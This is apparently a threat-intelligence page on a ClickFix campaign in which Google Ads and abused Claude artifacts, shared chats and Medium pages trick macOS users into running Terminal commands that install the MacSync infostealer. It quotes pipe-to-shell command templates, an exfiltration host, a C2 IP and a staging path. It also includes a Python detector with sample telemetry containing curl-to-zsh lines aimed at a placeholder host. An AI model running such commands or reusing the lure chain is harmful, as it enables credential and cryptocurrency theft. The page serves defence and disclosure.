ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a ClickFix-style social-engineering campaign that abuses Google sponsored search results to funnel macOS users to malicious content hosted on legitimate platforms, including Anthropic Claude public artifacts (claude.ai) and Medium pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode and execute payloads (e.g., echo "..." | base64 -D | zsh or curl ... | zsh). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated roughly 12,300 to 15,600 views, indicating significant exposure; coverage variously describes this as 10,000+ and 15,000+ potential victims.
The payloads deliver macOS information-stealing malware, including MacSync, which collects data such as Keychain credentials, browser data, and cryptocurrency wallet files. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into /tmp/osalogging.zip, and exfiltrating via HTTP POST to attacker infrastructure (e.g., a2abotnet[.]com/gate, with C2 paths like a2abotnet[.]com/dynamic). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
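The command shapes described above (an inline base64 blob decoded into a shell, a remote script piped into a shell, and staging into /tmp/osalogging.zip) are simple to hunt for in process-execution telemetry. The following detector is an added example, not code from the page or from the researchers cited; the sample command lines, the example.invalid host and the /tmp/collected path are constructed placeholders.

```python
import base64
import re
from dataclasses import dataclass

# Command shapes reported for this campaign: base64 blob decoded into a shell,
# remote script piped into a shell, and the /tmp staging archive for stolen data.
SHELL = r"(?:zsh|bash|sh)\b"
B64_TO_SHELL = re.compile(r"base64\s+(?:-D|-d|--decode)\s*\|\s*" + SHELL)
CURL_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*" + SHELL)
B64_BLOB = re.compile(r"""echo\s+["']?([A-Za-z0-9+/=]{16,})["']?\s*\|""")
STAGING_PATH = "/tmp/osalogging.zip"

@dataclass
class Finding:
    rule: str
    cmdline: str
    detail: str = ""  # decoded second stage, when one could be recovered

def decode_inline_b64(cmdline: str) -> str:
    """Decode the blob of an `echo <b64> | base64 -D` stage; '' if absent or invalid."""
    m = B64_BLOB.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
        return ""

def inspect_cmdline(cmdline: str) -> list[Finding]:
    """Apply the three rules to one process command line, recursing into decoded stages."""
    findings = []
    if B64_TO_SHELL.search(cmdline):
        decoded = decode_inline_b64(cmdline)
        findings.append(Finding("base64_decode_to_shell", cmdline, decoded))
        if decoded:  # the decoded stage usually carries the actual downloader
            findings.extend(inspect_cmdline(decoded))
    if CURL_TO_SHELL.search(cmdline):
        findings.append(Finding("remote_script_to_shell", cmdline))
    if STAGING_PATH in cmdline:
        findings.append(Finding("osalogging_staging_path", cmdline))
    return findings

def scan(cmdlines) -> list[Finding]:
    return [f for line in cmdlines for f in inspect_cmdline(line)]

# Constructed sample telemetry (not real campaign data); host and paths are placeholders.
_STAGE2 = "curl -fsSL https://example.invalid/install.sh | zsh"
SAMPLE_TELEMETRY = [
    "brew install htop",
    'echo "%s" | base64 -D | zsh' % base64.b64encode(_STAGE2.encode()).decode(),
    "curl -fsSL https://example.invalid/helper | zsh",
    "zip -r /tmp/osalogging.zip /tmp/collected",
]
```

Run `scan()` over command lines exported from your EDR or the macOS unified log; the recovered second stage in `Finding.detail` is what to pivot on for the download host.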

How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
GitHub Gist publishes IOCs for GitHub-themed macOS ClickFix campaign
On 2026-05-16, a GitHub Gist published indicators of compromise tied to a macOS-focused ClickFix infostealer campaign themed around GitHub. The IOC set included numerous suspicious domains and an IP address, revealing infrastructure likely used to stage, relay, or deliver malware through Mac-focused social-engineering lures.
Google ad for Homebrew leads to fake Claude ClickFix infection
On 2026-05-11, a malicious Google advertisement shown for Homebrew searches redirected users to a fake Claude download page that used ClickFix-style instructions to make victims paste a command into Terminal. During execution, the malware requested the user's password and macOS permissions including Finder and folder access, and researchers captured related network traffic for analysis.
Google Ads route users to malicious Claude shared chats on claude.ai
By 2026-05-10, researchers reported an active malvertising campaign in which Google Ads for Claude downloads led users to legitimate Claude.ai shared chats containing social-engineering instructions to paste malicious Terminal commands. BleepingComputer also identified a second malicious Claude shared chat using separate infrastructure, while one observed variant deployed MacSync and included victim profiling and CIS-region keyboard checks.
Fake Claude download ad delivers new macOS ClickFix payload
On 2026-04-22, researchers documented a malicious Google ad that redirected users to a fake Claude download page at cladesktop.gitlab.io, where a ClickFix-style flow delivered a password-protected ZIP containing a Mach-O arm64 malware sample saved as /tmp/helper. The infection chain used newly registered infrastructure including arkypc.com for payload delivery and communicated with a command-and-control server at 45.94.47.204:80.
Researchers report campaign reach exceeded 15,000 views
Investigators observed that at least one malicious Claude guide had accumulated significant exposure, with reported view counts ranging from more than 10,000 to over 15,000. This indicated the campaign had reached a large pool of potential macOS victims through promoted search results and trusted hosting platforms.
Researchers link multiple campaign variants to the same actor
Analysis by Moonlock Lab and AdGuard found the Claude Artifact and Medium impersonation variants likely came from the same threat actor because both retrieved second-stage payloads from the same command-and-control infrastructure. Researchers also noted the campaign fit a broader pattern of threat actors abusing public AI-sharing features previously seen with ChatGPT and Grok.
MacSync infostealer delivered through Claude and Medium lures
Victims who executed the copied shell commands downloaded a loader that installed the MacSync infostealer. The malware used AppleScript and other built-in macOS tools to steal Keychain data, browser information, and cryptocurrency wallet data, package it into /tmp/osalogging.zip, and exfiltrate it to attacker infrastructure including a2abotnet[.]com/gate.
Threat actors launch ClickFix campaign targeting macOS users
A financially motivated campaign began using Google Ads and SEO-poisoned search results to lure macOS users to fake support or how-to pages. The pages abused trusted platforms including Anthropic Claude Artifacts and Medium to socially engineer victims into pasting malicious Terminal commands.
Sources
MacOS_Github_Themed_Clickfix_16052026 · GitHub (gist.github.com)
macOS Malware Leverages Google Ads and Legitimate Claude.ai Shared Chats to Deliver Malware (cybersecuritynews.com)
Malware-Traffic-Analysis.net - 2026-05-11: Google ad for Homebrew leads to macOS malware infection (malware-traffic-analysis.net)
Hackers Abuse Google Ads and Claude.ai Shared Chats to Distribute macOS Malware - gHacks Tech News (ghacks.net)
Google Ads and Claude AI Abused to Spread MacSync Malware via ClickFix (hackread.com)
Claude LLM Artifacts Exploited to Distribute Mac Infostealer Malware via ClickFix Attack Chain Targeting macOS Users (rescana.com)
Threat Actors Exploit Claude Artifacts and Google Ads to Target macOS Users (cybersecuritynews.com)
Claude LLM artifacts abused to push Mac infostealers in ClickFix attack (bleepingcomputer.com)


